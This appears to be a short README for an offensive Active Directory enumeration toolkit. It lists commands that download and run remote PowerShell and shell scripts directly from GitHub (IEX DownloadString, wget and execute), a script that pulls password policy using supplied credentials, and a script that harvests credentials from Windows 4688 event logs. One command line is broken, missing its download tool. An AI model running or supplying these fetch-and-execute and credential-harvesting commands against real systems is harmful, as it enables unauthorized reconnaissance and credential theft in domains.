Windows:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kahvi-0/ADEnum/refs/heads/main/ADEnum.ps1')
adenum
Linux:
wget https://raw.githubusercontent.com/Kahvi-0/ADEnum/refs/heads/main/ADEnum.sh && chmod +x ADEnum.sh
./ADEnum.sh [One DC] [username] [password]
Windows - ensure that nmap is installed (may need to change the location in the script)
vulnscan.ps1 scope.txt
Automated enumeration of possible password policy locations
Linux
distingushed name can be found in bloodhound
https://raw.githubusercontent.com/Kahvi-0/ADEnum/main/passpull.sh && chmod +x passpull.sh
Usage
passpull.sh [user] [password] [dc list] [domain.local] [distingushed name]
Example
passpull.sh CoffeeLover 'p@ssword123' ./dcs.txt domain.local "CN=PENTEST,OU=USERS,OU=test,DC=lab,DC=LOCAL"
Inspired by: https://practicalsecurityanalytics.com/extracting-credentials-from-windows-logs/
Will Search through Windows 4688 events. This will only work if the client has enabled logging. The script will check for the regestry key.
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kahvi-0/ADEnum/main/logharvest.ps1')
More reading: